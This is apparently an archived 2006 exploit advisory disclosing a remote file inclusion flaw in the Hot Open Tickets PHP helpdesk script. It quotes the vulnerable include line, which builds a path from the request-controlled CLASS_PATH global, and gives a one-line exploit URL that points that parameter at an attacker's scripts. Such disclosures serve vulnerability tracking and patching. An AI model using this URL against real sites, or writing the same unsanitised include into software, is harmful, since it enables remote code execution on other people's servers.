Hot Open Tickets <= 11012004 (CLASS_PATH) Remote Include Vuln

2006-05-27 00:00:00

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: [email protected] or http://www.devilteam.yum.pl
# Site scripts: http://hotopentickets.sourceforge.net
#
####################################################################
*/ lib_action_step.php: Line(1-4)

include ($GLOBALS["CLASS_PATH"]."/User_list_class.php");
function print_action_list($a)
{

/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Expl:

http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]

#Elo ;-)

#

Fixes

No fixes

In order to submit a new fix you need to be registered.